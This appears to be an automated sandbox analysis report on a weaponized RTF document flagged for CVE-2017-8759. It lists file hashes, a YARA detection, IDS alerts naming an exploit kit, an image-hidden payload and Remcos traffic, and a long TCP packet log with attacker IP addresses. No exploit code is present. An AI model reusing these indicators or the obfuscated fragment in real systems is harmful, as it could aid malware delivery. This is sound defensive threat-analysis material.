                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                              Malicious:false
                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                              C:\Users\user\Desktop\~WRD0000.tmp

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                              Category:dropped
                              Size (bytes):41744
                              Entropy (8bit):5.189145922463506
                              Encrypted:false
                              SSDEEP:384:323tHbrN79ozVzEFH3W2j2xYuWXmddk9hZUPgRA5a5jkay95si6rGsNAYAXJqskN:323b3W2G3kGoRAk/y95AhAZqCO
                              MD5:E2C840CDB6F343D7067F7C9ABCBBC900
                              SHA1:D67DE2D3EEC584EA31AB5F4C41621108B4411151
                              SHA-256:04EDCBB532111FD4CBBE536774FC33CEAEB5C436B5F96D732A011F03B8729AF0
                              SHA-512:6C60906AC4716A99EDC721F3C60377BE92717B6256ADC877FEB872D33C33E816FABFB464FF8FDE305B8734F73CC06449190CC6CF9E3ACB6BA8CA67F24C2F149F
                              Malicious:true
                              Yara Hits:
                              • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New

                              C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0

                              Static File Info

                              General

                              File type:Rich Text Format data, version 1
                              Entropy (8bit):2.4493102661720756
                              TrID:
                              • Rich Text Format (5005/1) 55.56%
                              • Rich Text Format (4004/1) 44.44%
                              File name:4vzwJTZbwT.rtf
                              File size:80'092 bytes
                              MD5:7279ab0fbc0a02d8b6966ed3cdf67aca
                              SHA1:4a6bef6dba00cc872e10b66b00786ace03e6443a
                              SHA256:04714ec4a9cfa0304d2de5012ae1081850d2a2b080ad68831ba2c8385bda4d01
                              SHA512:c129b5bf918cd836ae2a2543354c222aeb6a9d8f8132f9cea30e43c8b0a3175d6a63fa2591bfea0950352495bf3b57abe692b29d88b19871286115ceca08cbc7
                              SSDEEP:384:NfDP6/ThqhsKJtWLrAz0HKrxSddu1rMuY5XrSd0Okp4xWt:Nz6/TUGKcPrKkPuxM1XrSLM
                              TLSH:5C73DF48E78F01A4CF54AA37465A0A8845FCB77EF70115B630AC93713BECC2E996557C
                              File Content Preview:{\rtf1............{\*\protusertbl666076059 \=}.{\119491334.(?-*4|]:48162>!.$?~.*0(88;~?<$`^$;.+/0*.21~_*>`@_&6?%|:*'34*,7|/^,4?+%?=<0.`0924~&?1.5:*?.02$0-?.5%<*)[9|@<?;?<_;72?('?;0?5+`3$`>!7?7|6(?[1.3~?.2:>>%;$,()9-`=5~9#0;`/-:3.;~`+1,0.%35%^]%<.^;59!45]8

                              File Icon

                              Icon Hash:2764a3aaaeb7bdbf

                              Static RTF Info

                              Objects

                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                              000000A6Ehno

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                              2024-07-29T16:15:12.077338+0200TCP2020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M18049165172.245.123.11192.168.2.22
                              2024-07-29T16:15:08.856525+0200TCP2047750ET MALWARE Base64 Encoded MZ In Image8049164198.46.176.133192.168.2.22
                              2024-07-29T16:15:13.845948+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection491666426192.168.2.22103.253.17.222
                              2024-07-29T16:15:10.936453+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image8049164198.46.176.133192.168.2.22
                              2024-07-29T16:15:15.887716+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4916780192.168.2.22178.237.33.50

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 29, 2024 16:15:03.107814074 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.060666084 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.060980082 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.061233044 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.066500902 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.599836111 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.599891901 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.599929094 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.599967957 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.599993944 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.600080967 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.600080967 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.600589037 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.600625038 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.600646019 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.600686073 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.601351023 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.601386070 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.601438046 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.601438046 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.602062941 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.602098942 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.602118015 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.602133036 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.602142096 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.602179050 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.608082056 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.608931065 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.608992100 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.609076023 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.609127998 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.660733938 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.660789013 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.660820961 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.660829067 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.660866022 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.660929918 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.661252975 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.661314964 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.661643028 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.661679983 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.661706924 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.661736012 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.662286997 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.662322998 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.662350893 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.662383080 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.662935019 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.662970066 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.662997961 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.663028002 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.663404942 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.663440943 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.663469076 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.663500071 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.664191961 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.664228916 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.664252043 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.664279938 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.664802074 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.664834976 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.664864063 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.664895058 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.665545940 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.665581942 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.665607929 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.665637016 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.666079998 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.666141033 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.666439056 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.666474104 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.666508913 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.666508913 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.666929007 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.666989088 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.667310953 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.667346954 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.667371035 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.667402029 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.667726994 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.667788029 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.753798008 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.753937960 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.753938913 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.753973007 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.753997087 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.754018068 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.754462004 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.754496098 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.754523039 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.754529953 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.754544973 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.754578114 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.755418062 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.755456924 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.755482912 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.755491018 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.755503893 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.755537987 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.756195068 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.756228924 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.756254911 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.756263971 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.756275892 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.756311893 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.757169962 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.757205963 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.757232904 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.757240057 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.757253885 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.757288933 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.758089066 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.758124113 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.758148909 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.758157969 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.758167028 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.758192062 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.758205891 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.758244038 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.759073019 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.759109020 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.759143114 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.759154081 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.759176970 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.759233952 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.759990931 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.760025024 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.760060072 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.760065079 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.760065079 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.760102987 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.760948896 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.760984898 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.761012077 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.761018991 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.761032104 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.761054993 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.761065960 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.761100054 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.761718988 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.761755943 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.761781931 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.761790037 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.761817932 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.761837006 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.762484074 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.762518883 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.762546062 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.762552977 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.762567043 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.762614965 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.763338089 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.763375998 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.763396025 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.763415098 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.763418913 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.763427973 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.763462067 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.763480902 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.764000893 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.764036894 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.764070034 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.764070034 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.764089108 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.764138937 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.764831066 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.764866114 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.764890909 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.764899015 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.764911890 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.764950991 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.765528917 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.765564919 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.765599012 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.765610933 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.765610933 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.765645981 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.847104073 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.847198009 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.847234964 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.847249031 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.847249031 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.847307920 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.847634077 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.847668886 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.847695112 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.847714901 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.847722054 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.847764015 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.848397017 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.848431110 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.848465919 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.848467112 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.848468065 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.848510027 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.849216938 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.849234104 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.849250078 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.849277020 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.849277020 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.849308968 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.850013018 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.850032091 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.850045919 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.850063086 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.850085974 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.850086927 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.850116968 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.850858927 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.850876093 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.850891113 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.850923061 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.850923061 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.851658106 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.851674080 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.851690054 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.851722956 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.851723909 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.852509975 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.852528095 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.852545023 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.852560043 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.852571964 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.852571964 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.852602959 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.852621078 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.853329897 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.853348970 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.853363991 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.853399038 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.853399038 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.854144096 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.854161978 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.854176998 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.854202986 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.854234934 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.854819059 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.854835987 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.854851007 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.854866982 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.854882002 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.854876995 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.854903936 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.854903936 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.854954958 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.855690956 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.855705976 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.855720997 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.855736971 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.855747938 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.855778933 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.855779886 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.856575966 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.856592894 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.856607914 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.856625080 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.856631041 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.856641054 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.856656075 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.856656075 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.856673956 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.856702089 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.857505083 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.857522964 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.857538939 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.857554913 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.857567072 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.857567072 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.857599020 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.857599020 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.858386993 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.858403921 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.858419895 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.858434916 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.858449936 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.858450890 CEST8049163172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:04.858449936 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.858469963 CEST4916380192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:04.858494997 CEST4916380192.168.2.22172.245.123.11
